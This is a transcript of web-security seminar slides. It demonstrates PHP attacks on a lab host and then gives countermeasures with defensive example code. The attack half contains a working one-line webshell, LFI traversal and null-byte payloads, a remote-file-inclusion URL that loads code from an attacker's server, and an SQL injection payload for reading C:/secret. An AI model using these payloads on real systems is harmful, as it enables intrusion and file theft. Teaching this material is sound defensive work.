Web vulnerability seminar4
Uploaded by sakuya-izayoi. Category: Technology.

Transcript of Web vulnerability seminar4

Web vulnerability seminar
Let's exploit

Contents
- PHP + Source code auditing
- DB + SQLi
- XSS & CSRF
- Something Else
- Finish..?

Something else contents
- Fiddler – Web Proxy Tool
- Webshell
- LFI/RFI
- File up/download (with SQLi)

Proxy Tool

Proxy Tool lists
- Paros
- Burpsuite
- Fiddler…

Request window
Response window
Request/Response Trap
Packet Capture

Packet creation
Compose

Webshell?

Webshell!

Webshell
- Differs by language: php, jsp, asp and so on
- But the principle is the same

Contents!
```php
// The entire webshell as shown on the slide: runs whatever the cmd parameter says.
system($_GET[cmd]);
```

php..
```html
<textarea name="CONTENT" style="width:100%; height:80%">
<?echo system($_GET[cmd]);
?></textarea>
```

Running the webshell

From now on we will use this.

Homepage

Flashback

???.php

Result

Path?
- include( path )
Path-related characters: ., /

Path?
- p = zizihacker == ../FI/zizihacker == ../../etc/FI/zizihacker…
Read the file C:\secret

LFI
- ../../../../../../../secret
- secret.php
```php
// Vulnerable include as shown on the slide (comments added): the user-controlled
// p parameter gets ".php" appended and goes straight into include().
if (isset($_GET['p'])) {
    $path = $_GET['p'] . ".php";
    include($path);
    echo "<br><br>";
}
```

With NULL.
- ../../../../../../../secret%00
- secret
```php
// Same code as the previous slide: the null byte in p terminates the path string,
// so the appended ".php" never reaches the filesystem.
if (isset($_GET['p'])) {
    $path = $_GET['p'] . ".php";
    include($path);
    echo "<br><br>";
}
```
The appended suffix ends up as %00.php, and everything after the null byte is cut off.

RFI
- Wouldn't a remote path work too?
- If so, couldn't we run or upload a file from our own server?

RFI

RFI
- Let's upload a php file we wrote ourselves
- http://192.168.32.75/RFI.php?p=

Exploit
- http://192.168.32.75/RFI.php?p=http://ip/path/test.txt%00
- http://192.168.32.75/RFI.php?p=http://ip/path/test.txt?

Why?

File upload
- File upload: write a post with a file upload request > saved to FTP or linked to the DB

File upload

Two vulnerabilities exist.
- The filename is used as-is
- An SQL injection vulnerability exists

Let's upload a webshell.

How do we find out the path?
Hint: ………………………………..

Server configuration can be overwritten too.
- .htaccess
- php.ini
- httpd.conf...

htaccess
Configuration can be changed per directory
- magic_quotes_gpc
- engine
- LFI/RFI-related settings
- various others

Flashback

SQL injection
- '1,'wer','2'),('2
+ a bit of sense?
Let's read the file C:\secret.

SQL
- INSERT INTO a,b,c values('',0x433a2f736563726574,1234)#',path,ip);
(0x433a2f736563726574 is the hex encoding of C:/secret)

File download
- Insert a value into the db through SQL injection
- Retrieve it through the file download feature.

Countermeasures: LFI
- Filter path-related characters
  - A normal filename never contains / !
- Store the pages in the db instead
  - A hassle to manage..
- Turn magic_quotes on to block NULL bytes
  - With magic_quotes_gpc on, %00 => \0
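As an added example (not from the seminar slides), the include handler from the LFI slides rebuilt along the lines of the countermeasures above: an allowlist of page names instead of character filtering, plus a realpath containment check. The pages/ directory and the page names are assumptions.

```php
<?php
// Added example, not the seminar's code: the LFI include handler rebuilt around
// an allowlist, as the "Countermeasures: LFI" slide recommends. Page files are
// assumed to live in pages/<name>.php next to this script.
declare(strict_types=1);

const PAGES_DIR     = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'board', 'notice'];   // assumed page names

// Returns the absolute path to include, or null if the request is not acceptable.
function resolvePage(string $p): ?string
{
    // 1. Allowlist instead of blocklisting "." and "/": "../", "%00" and
    //    "http://..." never reach the filesystem because they are not on the list.
    if (!in_array($p, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Defence in depth: resolve symlinks/".." and confirm the result is still
    //    below PAGES_DIR. (PHP >= 5.3.4 also rejects any path containing a NUL byte.)
    $base = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . '/' . $p . '.php');
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

if (isset($_GET['p'])) {
    $path = resolvePage((string) $_GET['p']);
    if ($path === null) {
        http_response_code(404);   // unknown or unacceptable page: nothing is included
        exit('no such page');
    }
    include $path;
    echo '<br><br>';
}
```

Remote URLs never reach include() because they are not on the allowlist; allow_url_include = off, from the RFI countermeasures, remains as an independent second layer.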

Countermeasures: RFI
- Blocked by the default options..
  - allow_url_fopen = off
  - allow_url_include = off
- If you must use it, drop everything except trusted urls

Countermeasures: File upload
- When using FTP, deny write permission to the anon account
  - Disabling the account entirely is also a good option
- When linked to a db, assess the sql vulnerabilities carefully.
  - Just turning on magic_quotes_gpc does fix it..
- Assign filenames randomly.
  - Same for the path
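An upload handler that applies the three countermeasures above, added here as an example and not the seminar's code; the form field name, table layout, DSN and storage directory are assumptions.

```php
<?php
// Added example, not the seminar's code: an upload handler implementing the three
// countermeasures above. Assumed: form field "upfile", a PDO connection, a table
// uploads(orig_name, stored_name, ip), and a storage directory outside the web root.
declare(strict_types=1);

const UPLOAD_DIR  = '/var/www/uploads_private';          // assumed; not served by httpd
const ALLOWED_EXT = ['jpg', 'png', 'gif', 'pdf', 'txt'];  // no php, htaccess, ini, conf
const MAX_BYTES   = 2 * 1024 * 1024;

// Stores one entry of $_FILES and records it; returns the server-chosen name.
function storeUpload(array $file, PDO $pdo, string $ip): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('upload rejected');
    }
    // The client-supplied name is used only to accept or reject the extension;
    // it is never part of the stored path (fixes "the filename is used as-is").
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException('file type not allowed');
    }
    // Random name in a fixed directory: no webshell name, no ".htaccess" and no
    // traversal can come from the request, and the location is not guessable.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $stored)) {
        throw new RuntimeException('could not store file');
    }
    // Prepared statement: the original name is bound as data, so the
    // "'1,'wer','2'),('2" payload from the SQL injection slide stays a plain string.
    $stmt = $pdo->prepare(
        'INSERT INTO uploads (orig_name, stored_name, ip) VALUES (:orig, :stored, :ip)'
    );
    $stmt->execute([':orig' => $file['name'], ':stored' => $stored, ':ip' => $ip]);
    return $stored;
}

if (isset($_FILES['upfile'])) {
    $pdo = new PDO('mysql:host=localhost;dbname=board', 'app', 'changeme'); // assumed DSN
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    echo htmlspecialchars(storeUpload($_FILES['upfile'], $pdo, $_SERVER['REMOTE_ADDR']));
}
```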

Addendum: File download
- Check the request and the permissions
  - Check for not-logged-in users and insufficient privileges
- Don't trust values fetched from the db as-is; check them
- Injection can also occur in the argument values of a download request!
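The matching download handler for files stored under a random name, again an added example rather than the seminar's code, following the order of checks above; the session key, table columns and DSN are assumptions.

```php
<?php
// Added example, not the seminar's code: the download side for randomly named
// uploads. Order of checks follows the slide: session and ownership first, then
// the DB value is re-validated, then the file is served from the fixed directory.
// Assumed: session key user_id, table uploads(id, owner_id, orig_name, stored_name).
declare(strict_types=1);
const UPLOAD_DIR = '/var/www/uploads_private';   // assumed; same as the upload handler

function sendDownload(PDO $pdo, int $id, int $userId): void
{
    // Lookup by integer id bound as a parameter: the download argument cannot inject.
    $stmt = $pdo->prepare('SELECT owner_id, orig_name, stored_name FROM uploads WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || (int) $row['owner_id'] !== $userId) {
        http_response_code(403);     // missing and not-yours look the same to the caller
        exit;
    }
    // The DB row is not trusted as-is: stored_name must look exactly like a name the
    // upload handler generates (32 hex chars + short extension), so an injected
    // "../../etc/passwd" or "C:/secret" is never served.
    if (!preg_match('/\A[0-9a-f]{32}\.[a-z0-9]{1,5}\z/', $row['stored_name'])) {
        http_response_code(500);
        exit;
    }
    $path = UPLOAD_DIR . '/' . $row['stored_name'];
    if (!is_file($path)) {
        http_response_code(404);
        exit;
    }
    // Force a download; the original name goes only into a header, never onto disk.
    header('Content-Type: application/octet-stream');
    header("Content-Disposition: attachment; filename*=UTF-8''" . rawurlencode($row['orig_name']));
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

session_start();
if (!isset($_SESSION['user_id'])) {
    http_response_code(401);         // not logged in: refuse before touching the DB
    exit;
}
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === false || $id === null) {
    http_response_code(400);
    exit;
}
$pdo = new PDO('mysql:host=localhost;dbname=board', 'app', 'changeme'); // assumed DSN
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
sendDownload($pdo, $id, (int) $_SESSION['user_id']);
```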